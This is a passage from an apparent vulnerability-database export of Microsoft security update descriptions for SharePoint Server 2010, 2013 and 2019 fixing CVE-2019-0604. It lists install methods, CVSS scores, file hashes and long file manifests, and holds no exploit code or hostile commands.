05:17 \nv3dwpowacalendar_dwp| owacalendar.dwp| | 534| 07-Sep-2018| 05:17 \nv3dwpowacontacts_dwp| owacontacts.dwp| | 534| 07-Sep-2018| 05:17 \nv3dwpowainbox_dwp| owainbox.dwp| | 550| 07-Sep-2018| 05:17 \nv3dwpowatasks_dwp| owatasks.dwp| | 525| 07-Sep-2018| 05:17 \nv3dwpowa_dwp| owa.dwp| | 510| 07-Sep-2018| 05:17 \nv3dwppplsbwp_dwp| peoplesearchbox.dwp| | 1,711| 07-Sep-2018| 05:17 \nv3dwpprofilebrowser_dwp| profilebrowser.dwp| | 644| 07-Sep-2018| 05:17 \nv3dwpquicklinks_dwp| quicklinks.dwp| | 526| 07-Sep-2018| 05:17 \nv3dwpsiteframer_dwp| siteframer.dwp| | 909| 07-Sep-2018| 05:17 \nv3dwpsocialcomment_dwp| socialcomment.dwp| | 579| 07-Sep-2018| 05:17 \nv3dwptagcloud_dwp| tagcloud.dwp| | 562| 07-Sep-2018| 05:17 \nv3dwpthisweekinpicsdwp_dwp| thisweekinpictures.dwp| | 456| 07-Sep-2018| 05:17 \nv3dwptopsiteswp_dwp| topsiteswebpart.webpart| | 1,569| 07-Sep-2018| 05:17 \nv3newshomelayout.aspx| newshomelayout.aspx| | 5,842| 07-Sep-2018| 05:17 \nv3rootportalhomelayout_aspx| defaultlayout.aspx| | 6,446| 07-Sep-2018| 05:17 \nv3rootportalhome_aspx| default.aspx| | 284| 07-Sep-2018| 05:17 \nv3tabviewpage.aspx| tabviewpage.aspx| | 286| 07-Sep-2018| 05:17 \nv3tabviewpagelyt.aspx| tabviewpagelayout.aspx| | 4,912| 07-Sep-2018| 05:17 \nv3xmlonet_xml| onet.xml| | 18,019| 07-Sep-2018| 05:17 \nvalues.sql.62b8ceef_1020_4520_8b7c_a5a4c498eb66| values.sql| | 240,048| 11-Sep-2018| 06:22 \nvarex.asx| variationexport.aspx| | 266| 07-Sep-2018| 12:41 \nvarim.asx| variationimport.aspx| | 7,551| 07-Sep-2018| 12:41 \nvarlabmenu.asx| variationslabelmenu.ascx| | 460| 07-Sep-2018| 12:41 \nvarlbl.asx| variationlabel.aspx| | 14,871| 07-Sep-2018| 12:41 \nvarlbls.asx| variationlabels.aspx| | 11,080| 07-Sep-2018| 12:41 \nvarlogs.asx| variationlogs.aspx| | 9,193| 07-Sep-2018| 12:41 \nvarroot.asx| variationsrootlanding.ascx| | 8,190| 07-Sep-2018| 12:41 \nvarset.asx| variationsettings.aspx| | 14,174| 07-Sep-2018| 12:41 \nvbcdextensioncallbasedscript.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| vbcdextensioncallbasedscript.xml| | 1,646| 07-Sep-2018| 04:39 \nvbcdextensionfilebasedscript.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| vbcdextensionfilebasedscript.xml| | 1,145| 07-Sep-2018| 04:39 \nvbmaobjectscript.xml.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| vbmaobjectscript.xml| | 2,598| 07-Sep-2018| 04:39 \nvbmvobjectscript.xml.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| vbmvobjectscript.xml| | 943| 07-Sep-2018| 04:39 \nvbpasswordextensionscript.xm.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| vbpasswordextensionscript.xml| | 1,937| 07-Sep-2018| 04:39 \nvbwmirunscript.xml.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| vbwmirunscript.xml| | 1,009| 07-Sep-2018| 04:39 \nvsprojectcs.xsl.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| vsprojectcs.xsl| | 4,725| 07-Sep-2018| 04:39 \nvsprojectvb.xsl.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| vsprojectvb.xsl| | 4,996| 07-Sep-2018| 04:39 \nvwscope1.apx| viewscopes.aspx| | 13,825| 07-Sep-2018| 05:12 \nvwscopes.apx| viewscopes.aspx| | 22,951| 07-Sep-2018| 05:12 \nvwscpse1.apx| viewscopesettings.aspx| | 13,328| 07-Sep-2018| 05:12 \nvwscpset.apx| viewscopesettings.aspx| | 8,050| 07-Sep-2018| 05:12 \nwarning.asx| warning.aspx| | 3,942| 07-Sep-2018| 04:57 \nwebconfig.extended.search.xml| webconfig.extended.search.xml| | 538| 07-Sep-2018| 05:12 \nwebconfig.mosschart.xml_481077871| webconfig.mosschart.xml| | 400| 07-Sep-2018| 04:32 \nwebconfig.sps.xml| webconfig.sps.xml| | 18,266| 07-Sep-2018| 05:17 \nwebfldr.asx_multilang| webfldr.aspx| | 2,590| 11-Sep-2018| 03:11 \nwebtaggingdialog.js| webtaggingdialog.js| | 17,313| 11-Sep-2018| 07:14 \nwebtaggingtialog.apx| webtaggingdialog.aspx| | 5,484| 11-Sep-2018| 07:14 \nwelcomelayout2.aspx| welcomelayout2.aspx| | 4,170| 07-Sep-2018| 05:17 \nwizardconnecttodata.aspx_2060739507| wizardconnecttodata.aspx| | 8,027| 07-Sep-2018| 04:32 \nwizardconnecttodatastep1.ascx_2060739507| wizardconnecttodatastep1.ascx| | 4,360| 07-Sep-2018| 04:32 \nwizardconnecttodatastep2.ascx_2060739507| wizardconnecttodatastep2.ascx| | 13,155| 07-Sep-2018| 04:32 \nwizardconnecttodatastep3.ascx_2060739507| wizardconnecttodatastep3.ascx| | 14,012| 07-Sep-2018| 04:32 \nwizardconnecttodatastep4.ascx_2060739507| wizardconnecttodatastep4.ascx| | 2,393| 07-Sep-2018| 04:32 \nwizardcustomizechart.aspx_2060739507| wizardcustomizechart.aspx| | 7,523| 07-Sep-2018| 04:32 \nwizardcustomizechartstep1.ascx_2060739507| wizardcustomizechartstep1.ascx| | 5,979| 07-Sep-2018| 04:32 \nwizardcustomizechartstep2.ascx_2060739507| wizardcustomizechartstep2.ascx| | 5,239| 07-Sep-2018| 04:32 \nwizardcustomizechartstep3.ascx_2060739507| wizardcustomizechartstep3.ascx| | 9,027| 07-Sep-2018| 04:32 \nwizardlist.aspx_2060739507| wizardlist.aspx| | 4,437| 07-Sep-2018| 04:32 \nwlcmlnk.apx| welcomelinks.aspx| | 7,674| 07-Sep-2018| 12:41 \nwlcmspl.xml| welcomesplash.aspx| | 7,873| 07-Sep-2018| 12:41 \nwlcmtoc.xml| welcometoc.aspx| | 6,953| 07-Sep-2018| 12:41 \nwmirunscript.xml.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| wmirunscript.xml| | 1,493| 07-Sep-2018| 04:39 \nworkflowdisco.aspx| workflowdisco.aspx| | 1,311| 07-Sep-2018| 12:45 \nworkflowwsdl.aspx| workflowwsdl.aspx| | 16,806| 07-Sep-2018| 12:45 \nwrktaskip.aspx| wrktaskip.aspx| | 3,929| 11-Sep-2018| 03:11 \nwsrpmp.aspx| wsrpmarkupproxy.aspx| | 241| 07-Sep-2018| 05:17 \nwsrp_dwp| wsrpconsumerwebpart.dwp| | 457| 07-Sep-2018| 05:17 \nxlatewfassoc.aspx| xlatewfassoc.aspx| | 9,567| 11-Sep-2018| 03:11 \nxmlmapropertypages.dll.amd64.b303d9c5_e8ba_4707_ab22_6e3d5e7d6e18| xmlmapropertypages.dll| 4.0.2450.49| 383,608| 11-Sep-2018| 06:22 \nxslappst.asc| xslapplicatorsettings.ascx| | 3,048| 07-Sep-2018| 12:41 \n \nHow to get help and support for this security updateHelp for installing updates: [Protect yourself online](<https://www.microsoft.com/safety/pc-security/updates.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Security](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-03-12T00:00:00", "type": "mskb", "title": "Description of the security update for SharePoint Server 2010: March 12, 2019", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604"], "modified": "2019-03-12T00:00:00", "id": "KB4462184", "href": "https://support.microsoft.com/en-us/help/4462184", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T09:34:10", "description": "None\n## Summary\n\nThis security update resolves a remote code execution vulnerability that exists in Microsoft SharePoint if the software does not check the source markup of an application package. To learn more about this vulnerability, see [Microsoft Common Vulnerabilities and Exposures CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>). \n \n**Note** To apply this security update, you must have the release version of [Service Pack 1 for Microsoft SharePoint Server 2013](<http://support.microsoft.com/kb/2880552>) installed on the computer.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4462202>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * [Download security update 4462202 for the 64-bit version of SharePoint Enterprise Server 2013](<http://www.microsoft.com/download/details.aspx?familyid=bb98da67-5aa3-41eb-929d-d182a746aa52>)\n\n## More Information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: March 12, 2019](<https://support.microsoft.com/en-us/help/20190312>).\n\n### Security update replacement information\n\nThis security update replaces previously released security update [4462139](<http://support.microsoft.com/help/4462139>).\n\n### File hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \ncoreserverloc2013-kb4462202-fullfile-x64-glb.exe| 2C314B87047CBA9846B848F08B65DE8C71F6873D| B7ADD4E5CB21A22E9936C616F8AE5CB31B334A83E941FDFF37DC47D28E874531 \n \nFile informationDownload the [list of files that are included in security update 4462202](<http://download.microsoft.com/download/F/4/1/F4133B56-7B58-466F-B7D5-CE52F2094E0F/4462202.csv>).\n\n## How to get help and support for this security update\n\nHelp for installing updates: [Protect yourself online](<https://www.microsoft.com/safety/pc-security/updates.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Security](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-03-12T00:00:00", "type": "mskb", "title": "Description of the security update for SharePoint Enterprise Server 2013: March 12, 2019", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0604"], "modified": "2019-03-12T00:00:00", "id": "KB4462202", "href": "https://support.microsoft.com/en-us/help/4462202", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T09:34:10", "description": "None\n## Summary\n\nThis security update resolves a remote code execution vulnerability that exists in Microsoft SharePoint if the software does not check the source markup of an application package. To learn more about the vulnerability, see Microsoft Common Vulnerabilities and Exposures [CVE-2019-0604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0604>). \n \n**Note** To apply this security update, you must have the release version of Microsoft SharePoint Server 2019 installed.\n\n## Improvements and fixes\n\nContains the following improvement and fixes:\n\n * Adds support for the new Japan era in SharePoint Server 2019.\n * Editing a project-level custom field while on a project detail page (PDP) cuases lost task-level calculated custom field values if the field formula includes the task's Unique ID.\n * When you upload content to a document library, selecting a destination folder doesn't work. This issue occurs when you open the SharePoint site by using the Microsoft Edge browser.\n\n## How to get and install the update\n\n### Method 1: Microsoft Update\n\nThis update is available through Windows Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to turn on automatic updating, see [Windows Update: FAQ](<https://support.microsoft.com/en-us/help/12373/windows-update-faq>).\n\n### Method 2: Microsoft Update Catalog\n\nTo get the standalone package for this update, go to the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/Search.aspx?q=KB4462199>) website.\n\n### Method 3: Microsoft Download Center\n\nYou can get the standalone update package through the Microsoft Download Center. Follow the installation instructions on the download page to install the update.\n\n * [Download security update 4462199 for the 64-bit version of SharePoint Server 2019](<http://www.microsoft.com/download/details.aspx?familyid=d43632da-bbbe-4ac2-8365-df209a207eae>)\n\n## More information\n\n### Security update deployment information\n\nFor deployment information about this update, see [security update deployment information: March 12, 2019](<https://support.microsoft.com/en-us/help/20190312>).\n\n### Security update replacement information\n\nThis security update replaces the previously released update [4462171](<https://support.microsoft.com/help/4462171>).\n\n### File hash information\n\nFile name| SHA1 hash| SHA256 hash \n---|---|--- \nsts2019-kb4462199-fullfile-x64-glb.exe| 937945CC1E08E4AB4F21E4A247C49668AE126373| FAF95F4A30627D176EC24E4B6AE7A817C21611C87FB59DCFA252059DC0FDB549 \n \nFile informationThe English (United States) version of this software update installs files that have the attributes that are listed in the following table. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.\n\n## \n\n__\n\nFor all supported x64-based versions of SharePoint Server 2019\n\nFile identifier| File name| File version| File size| Date| Time \n---|---|---|---|---|--- \nascalc.dll| ascalc.dll| 16.0.10342.12113| 1001096| 4-Mar-19| 09:37 \nmicrosoft.office.access.server.application.dll| microsoft.office.access.server.application.dll| 16.0.10342.12113| 616792| 4-Mar-19| 09:37 \naccsrv.layouts.root.accsrvscripts.js| accessserverscripts.js| | 575536| 4-Mar-19| 09:36 \nconversion.chartserver.dll| chartserver.dll| 16.0.10342.12113| 16094320| 4-Mar-19| 09:28 \nppt.conversion.chartserver.dll| chartserver.dll| 16.0.10342.12113| 16094320| | \nppt.edit.chartserver.dll| chartserver.dll| 16.0.10342.12113| 16094320| | \nwac.office.chartserver.dll| chartserver.dll| 16.0.10342.12113| 16094320| | \nprodfeat.xml| feature.xml| | 616| 19-Feb-19| 06:50 \nastcmmn_js| assetcommon.js| | 18255| 4-Mar-19| 09:31 \nastpkrs_js| assetpickers.js| | 68294| 4-Mar-19| 09:32 \nsm.js| cmssitemanager.js| | 29281| 4-Mar-19| 09:31 \ncmssummarylinks_js| cmssummarylinks.js| | 6017| 4-Mar-19| 09:32 \neditmenu_js| editingmenu.js| | 11361| 4-Mar-19| 09:32 \nhierlist_js| hierarchicallistbox.js| | 30329| 4-Mar-19| 09:31 \nmediaplayer.js| mediaplayer.js| | 47727| 4-Mar-19| 09:32 \nptdlg.js| pickertreedialog.js| | 2952| 4-Mar-19| 09:32 \nselect_js| select.js| | 2389| 4-Mar-19| 09:32 \nslctctls_js| selectorcontrols.js| | 13290| 4-Mar-19| 09:31 \nserializ_js| serialize.js| | 3221| 4-Mar-19| 09:32 \nsp.ui.assetlibrary.ribbon.debug.js| sp.ui.assetlibrary.debug.js| | 13367| 4-Mar-19| 09:31 \nsp.ui.assetlibrary.js| sp.ui.assetlibrary.js| | 5457| 4-Mar-19| 09:32 \nsp.ui.pub.htmldesign.debug.js| sp.ui.pub.htmldesign.debug.js| | 38342| 4-Mar-19| 09:32 \nsp.ui.pub.htmldesign.js| sp.ui.pub.htmldesign.js| | 19409| 4-Mar-19| 09:32 \nsp.ui.pub.ribbon.debug.js| sp.ui.pub.ribbon.debug.js| | 146313| 4-Mar-19| 09:31 \nsp.ui.pub.ribbon.js| sp.ui.pub.ribbon.js| | 84981| 4-Mar-19| 09:31 \nsp.ui.rte.publishing.debug.js| sp.ui.rte.publishing.debug.js| | 98216| 4-Mar-19| 09:31 \nsp.ui.rte.publishing.js| sp.ui.rte.publishing.js| | 49718| 4-Mar-19| 09:32 \nsp.ui.spellcheck.debug.js| sp.ui.spellcheck.debug.js| | 68393| 4-Mar-19| 09:31 \nsp.ui.spellcheck.js| sp.ui.spellcheck.js| | 36524| 4-Mar-19| 09:32 \nsplchkpg_js| spellcheckentirepage.js| | 6655| 4-Mar-19| 09:32 \nspelchek_js| spellchecker.js| | 34659| 4-Mar-19| 09:32 \nvideoportal.js| videoportal.js| | 14744| 4-Mar-19| 09:31 \nmicrosoft.sharepoint.publishing.dll_isapi| microsoft.sharepoint.publishing.dll| 16.0.10342.12113| 5526880| 4-Mar-19| 09:17 \nsharepointpub.dll| microsoft.sharepoint.publishing.dll| 16.0.10342.12113| 5526880| 4-Mar-19| 09:17 \nsharepointpub_gac.dll| microsoft.sharepoint.publishing.dll| 16.0.10342.12113| 5526880| 4-Mar-19| 09:17 \nschema.xml_pubresfeap| schema.xml| | 44173| 15-Feb-19| 10:35 \nasctyps.xml| assetcontenttypes.xml| | 2846| 15-Feb-19| 10:34 \nasctyps2.xml| assetcontenttypes2.xml| | 2460| 15-Feb-19| 10:34 \nasflds.xml| assetfields.xml| | 1366| 15-Feb-19| 10:34 \nasflds2.xml| assetfields2.xml| | 1045| 15-Feb-19| 10:35 \naslibalt.xml| assetlibrarytemplate.xml| | 555| 15-Feb-19| 10:34 \naslibft.xml| feature.xml| | 2763| 15-Feb-19| 10:35 \naslibui.xml| provisionedui.xml| | 5075| 15-Feb-19| 10:35 \naslibui2.xml| provisionedui2.xml| | 1708| 15-Feb-19| 10:34 \ncdsele.xml| contentdeploymentsource.xml| | 637| 15-Feb-19| 10:39 \ncdsfeatu.xml| feature.xml| | 604| 15-Feb-19| 10:38 \ndocmpgcv.xml| docmpageconverter.xml| | 496| 15-Feb-19| 10:35 \ndocxpgcv.xml| docxpageconverter.xml| | 496| 15-Feb-19| 10:35 \nconvfeat.xml| feature.xml| | 766| 18-Feb-19| 02:36 \nippagecv.xml| infopathpageconverter.xml| | 577| 15-Feb-19| 10:35 \nxslappcv.xml| xslapplicatorconverter.xml| | 575| 18-Feb-19| 02:37 \nanalyticsreports.xml| analyticsreports.xml| | 2850| 18-Feb-19| 02:32 \nxspsset.xml| catalogsitesettings.xml| | 556| 18-Feb-19| 02:32 \nxspfeat.xml| feature.xml| | 1514| 18-Feb-19| 02:33 \ndepoper.xml| deploymentoperations.xml| | 2415| 19-Feb-19| 06:54 \ndepfeat.xml| feature.xml| | 788| 15-Feb-19| 10:52 \npestset.xml| enhancedhtmlediting.xml| | 157| 18-Feb-19| 02:29 \npefeat.xml| feature.xml| | 793| 18-Feb-19| 02:29 \nenthmft.xml| feature.xml| | 564| 15-Feb-19| 10:36 \nenthmset.xml| themingsitesettings.xml| | 1005| 15-Feb-19| 10:35 \nenctb.xml| enterprisewikicontenttypebinding.xml| | 559| 18-Feb-19| 02:44 \nenctb2.xml| enterprisewikicontenttypebinding2.xml| | 390| 18-Feb-19| 02:44 \nenfet.xml| feature.xml| | 1168| 18-Feb-19| 02:45 \nenct.xml| enterprisewikicontenttypes.xml| | 1456| 19-Feb-19| 07:09 \nenct2.xml| enterprisewikicontenttypes2.xml| | 1211| 15-Feb-19| 10:29 \nenlayfet.xml| feature.xml| | 1618| 19-Feb-19| 07:08 \nprov.xml| provisionedfiles.xml| | 1181| 15-Feb-19| 10:29 \nprov2.xml| provisionedfiles2.xml| | 1197| 19-Feb-19| 07:08 \newiki2.xml| feature.xml| | 766| 19-Feb-19| 07:07 \nhtmlfeat.xml| feature.xml| | 11263| 18-Feb-19| 02:38 \nhtmlcolm.xml| htmldesigncolumns.xml| | 909| 18-Feb-19| 02:39 \nhtmlcol2.xml| htmldesigncolumns2.xml| | 543| 18-Feb-19| 02:38 \nhtmlcol3.xml| htmldesigncolumns3.xml| | 597| 18-Feb-19| 02:38 \nhtmlcont.xml| htmldesigncontenttypes.xml| | 2330| 18-Feb-19| 02:38 \nhtmlfile.xml| htmldesignfiles.xml| | 657| 18-Feb-19| 02:38 \nhtmlfil2.xml| htmldesignfiles2.xml| | 771| 18-Feb-19| 02:38 \nhtmlfil3.xml| htmldesignfiles3.xml| | 895| 18-Feb-19| 02:39 \nhtmldpui.xml| htmldesignprovisionedui.xml| | 669| 18-Feb-19| 02:39 \nhtmldrib.xml| htmldesignribbon.xml| | 29320| 18-Feb-19| 02:39 \nhtmldpct.xml| htmldisplaytemplatecontenttypes.xml| | 11361| 18-Feb-19| 02:38 \nhtmldpwp.xml| htmldisplaytemplatefiles.xml| | 9302| 18-Feb-19| 02:38 \nhtmldpwp10.xml| htmldisplaytemplatefiles10.xml| | 575| 18-Feb-19| 02:38 \nhtmldpwp11.xml| htmldisplaytemplatefiles11.xml| | 1091| 18-Feb-19| 02:39 \nhtmldpwp12.xml| htmldisplaytemplatefiles12.xml| | 401| 18-Feb-19| 02:39 \nhtmldpwp13.xml| htmldisplaytemplatefiles13.xml| | 396| 18-Feb-19| 02:38 \nhtmldpwp14.xml| htmldisplaytemplatefiles14.xml| | 856| 18-Feb-19| 02:38 \nhtmldpwp15.xml| htmldisplaytemplatefiles15.xml| | 492| 18-Feb-19| 02:38 \nhtmldpwp2.xml| htmldisplaytemplatefiles2.xml| | 830| 18-Feb-19| 02:38 \nhtmldpwp3.xml| htmldisplaytemplatefiles3.xml| | 497| 18-Feb-19| 02:39 \nhtmldpwp4.xml| htmldisplaytemplatefiles4.xml| | 496| 18-Feb-19| 02:39 \nhtmldpwp5.xml| htmldisplaytemplatefiles5.xml| | 506| 18-Feb-19| 02:39 \nhtmldpwp6.xml| htmldisplaytemplatefiles6.xml| | 412| 18-Feb-19| 02:38 \nhtmldpwp7.xml| htmldisplaytemplatefiles7.xml| | 4003| 18-Feb-19| 02:38 \nhtmldpwp8.xml| htmldisplaytemplatefiles8.xml| | 399| 18-Feb-19| 02:38 \nhtmldpwp9.xml| htmldisplaytemplatefiles9.xml| | 401| 18-Feb-19| 02:39 \nhtmldtcbs.xml| htmldisplaytemplatefilesoobcbs.xml| | 580| 18-Feb-19| 02:38 \nhtmldtqb.xml| htmldisplaytemplatefilesqb.xml| | 598| 18-Feb-19| 02:38 \nhtmldtqbref.xml| htmldisplaytemplatefilesqbref.xml| | 507| 18-Feb-19| 02:39 \nhtmldpwp_recs.xml| htmldisplaytemplatefilesrecs.xml| | 418| 18-Feb-19| 02:39 \nststngimplk.xml| sitesettingsimportlink.xml| | 667| 18-Feb-19| 02:38 \naltmp.xam| alternatemediaplayer.xaml| | 35634| 18-Feb-19| 02:38 \nmwpfeat.xml| feature.xml| | 940| 18-Feb-19| 02:37 \nmwpprovf.xml| provisionedfiles.xml| | 1457| 18-Feb-19| 02:38 \nmwpprovu.xml| provisionedui.xml| | 22914| 18-Feb-19| 02:37 \nmwpprovui2.xml| provisionedui2.xml| | 2690| 18-Feb-19| 02:37 \npnfeat.xml| feature.xml| | 782| 18-Feb-19| 02:30 \npnstset.xml| navigationsitesettings.xml| | 4721| 18-Feb-19| 02:28 \nplnfeat.xml| feature.xml| | 760| 15-Feb-19| 10:46 \nplnstset.xml| navigationsitesettings.xml| | 152| 15-Feb-19| 10:46 \ntpfeat.xml| feature.xml| | 2846| 15-Feb-19| 10:52 \ntpcls.xml| pointpublishingcolumns.xml| | 701| 15-Feb-19| 10:53 \ntpcts.xml| pointpublishingcontenttypes.xml| | 488| 15-Feb-19| 10:52 \ntptltsch.xml| schema.xml| | 4088| 18-Feb-19| 02:49 \npclts.xml| schema.xml| | 2354| 18-Feb-19| 02:44 \npcltf.xml| feature.xml| | 857| 19-Feb-19| 07:11 \npclt.xml| productcataloglisttemplate.xml| | 753| 15-Feb-19| 10:29 \npcfeat.xml| feature.xml| | 1699| 18-Feb-19| 02:33 \npccol.xml| productcatalogcolumns.xml| | 6259| 18-Feb-19| 02:33 \npcct.xml| productcatalogcontenttypes.xml| | 830| 18-Feb-19| 02:32 \npcct2.xml| productcatalogcontenttypes2.xml| | 643| 18-Feb-19| 02:32 \npcprov.xml| provisionedfiles.xml| | 926| 18-Feb-19| 02:33 \npubpubpf.xml| feature.xml| | 551| 18-Feb-19| 02:49 \npppptset.xml| portalsettings.xml| | 584| 18-Feb-19| 02:48 \nctconvst.xml| contenttypeconvertersettings.xml| | 511| 18-Feb-19| 02:44 \ndoclbset.xml| documentlibrarysettings.xml| | 524| 18-Feb-19| 02:44 \neditmenu.xml| editingmenu.xml| | 470| 18-Feb-19| 02:44 \npubfeat.xml| feature.xml| | 2696| 18-Feb-19| 02:45 \npaglttmp.xml| pageslisttemplate.xml| | 516| 18-Feb-19| 02:45 \nprovui.xml| provisionedui.xml| | 40574| 18-Feb-19| 02:44 \nprovui2.xml| provisionedui2.xml| | 1489| 18-Feb-19| 02:45 \nprovui3.xml| provisionedui3.xml| | 2135| 18-Feb-19| 02:45 \npubstset.xml| publishingsitesettings.xml| | 6235| 18-Feb-19| 02:44 \nregext.xml| regionalsettingsextensions.xml| | 328| 18-Feb-19| 02:44 \nsiteacmn.xml| siteactionmenucustomization.xml| | 646| 18-Feb-19| 02:45 \nvarflagc.xml| variationsflagcontrol.xml| | 473| 18-Feb-19| 02:44 \nvarnomin.xml| variationsnomination.xml| | 613| 18-Feb-19| 02:45 \npblyfeat.xml| feature.xml| | 6194| 18-Feb-19| 02:49 \npblyprovfile.xml| provisionedfiles.xml| | 7964| 18-Feb-19| 02:48 \npblyprovfile2.xml| provisionedfiles2.xml| | 610| 18-Feb-19| 02:49 \npblyprovfile4.xml| provisionedfiles4.xml| | 308| 18-Feb-19| 02:48 \npblyprovfile5.xml| provisionedfiles5.xml| | 414| 18-Feb-19| 02:49 \npblyprovfile6.xml| provisionedfiles6.xml| | 385| 18-Feb-19| 02:49 \npblyprovfile7.xml| provisionedfiles7.xml| | 1170| 18-Feb-19| 02:50 \npblyprovfile8.xml| provisionedfiles8.xml| | 507| 18-Feb-19| 02:48 \npblyprovui.xml| provisionedui.xml| | 11330| 18-Feb-19| 02:49 \nxspfeatlayouts.xml| searchboundpagelayouts.xml| | 3671| 15-Feb-19| 10:48 \npubmelem.xml| elements.xml| | 4149| 15-Feb-19| 10:37 \npubmele2.xml| elements2.xml| | 592| 15-Feb-19| 10:38 \npubmfeat.xml| feature.xml| | 1697| 15-Feb-19| 10:37 \npubmprui.xml| provisionedui.xml| | 1548| 15-Feb-19| 10:37 \npubmstng.xml| sitesettings.xml| | 670| 15-Feb-19| 10:37 \npubprft.xml| feature.xml| | 758| 19-Feb-19| 06:56 \npubrfeat.xml| feature.xml| | 4927| 18-Feb-19| 02:29 \nprovfile.xml| provisionedfiles.xml| | 4739| 18-Feb-19| 02:28 \nprovfl4.xml| provisionedfiles4.xml| | 1394| 18-Feb-19| 02:29 \npubrcol.xml| publishingcolumns.xml| | 20566| 18-Feb-19| 02:29 \npubrctt.xml| publishingcontenttypes.xml| | 12093| 18-Feb-19| 02:30 \npubrctt2.xml| publishingcontenttypes2.xml| | 304| 18-Feb-19| 02:29 \npubrctt3.xml| publishingcontenttypes3.xml| | 500| 18-Feb-19| 02:30 \npubrcont.xml| publishingcontrols.xml| | 405| 18-Feb-19| 02:29 \nprsset.xml| publishingresourcessitesettings.xml| | 3506| 18-Feb-19| 02:28 \nupgd1.xml| upgrade1.xml| | 548| 18-Feb-19| 02:28 \nupgd2.xml| upgrade2.xml| | 486| 18-Feb-19| 02:29 \nupgd3.xml| upgrade3.xml| | 600| 18-Feb-19| 02:28 \npubtfeat.xml| feature.xml| | 1477| 18-Feb-19| 02:34 \nrollplf.xml| feature.xml| | 862| 15-Feb-19| 10:52 \nrollplpf.xml| provisionedfiles.xml| | 14529| 15-Feb-19| 10:52 \nrollplct.xml| rolluppagecontenttype.xml| | 742| 15-Feb-19| 10:52 \nrollpf.xml| feature.xml| | 816| 15-Feb-19| 10:44 \nrollps.xml| rolluppagesettings.xml| | 4091| 15-Feb-19| 10:44 \nseofeatu.xml| feature.xml| | 1253| 15-Feb-19| 10:37 \nseoopt.xml| searchengineoptimization.xml| | 3578| 15-Feb-19| 10:37 \nseoopt1.xml| searchengineoptimization1.xml| | 2904| 15-Feb-19| 10:37 \nsppelm.xml| elements.xml| | 1843| 15-Feb-19| 10:47 \nsppfea.xml| 